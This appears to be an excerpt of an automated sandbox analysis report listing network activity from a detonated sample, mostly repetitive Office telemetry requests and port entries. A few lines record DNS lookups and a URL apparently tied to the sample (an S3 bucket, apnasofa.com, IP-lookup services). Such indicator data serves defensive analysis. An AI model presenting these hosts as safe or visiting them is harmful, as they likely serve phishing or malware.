Source: global trafficHTTP traffic detected: GET /rules/rule703700v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703751v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703750v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule704050v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule704051v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703951v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703950v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700001v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700000v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703051v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703050v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703551v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703550v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule704001v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule704000v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703301v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703300v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120128v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120603v8s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120607v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule230104v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule230157v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule230158v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule230162v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule230164v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule230165v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule230166v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule230167v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule230168v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule230169v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule230170v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule230171v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule230172v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule230173v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule230174v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120119v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule224900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule704101v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule704100v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule704201v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficDNS traffic detected: DNS query: www.google.sn
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: x1.i.lencr.org
Source: global trafficDNS traffic detected: DNS query: i--iy.s3.us-east-1.amazonaws.com
Source: global trafficDNS traffic detected: DNS query: apnasofa.com
Source: global trafficDNS traffic detected: DNS query: api.ipify.org
Source: global trafficDNS traffic detected: DNS query: ipwhois.app
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 02 Dec 2024 16:55:27 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
Source: 77EC63BDA74BD0D0E0426DC8F80085060.1.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: 2D85F72862B55C4EADD9E66E06947F3D0.1.drString found in binary or memory: http://x1.i.lencr.org/
Source: chromecache_162.5.drString found in binary or memory: https://apnasofa.com/episode/index#
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49865
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49986
Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49864
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49985
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49863
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49984
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49862
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49983
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49861
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49982
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49860
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49981
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49980
Source: unknownNetwork traffic detected: HTTP traffic on port 49932 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49898 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49875 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49990 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49859
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49858
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49979
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49857
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49978
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49856
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49977
Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49855
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49976
Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49854
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49975
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49853
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49974
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49973
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49851
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49972
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49971
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49970
Source: unknownNetwork traffic detected: HTTP traffic on port 49967 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50004 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49909 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49943 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49849
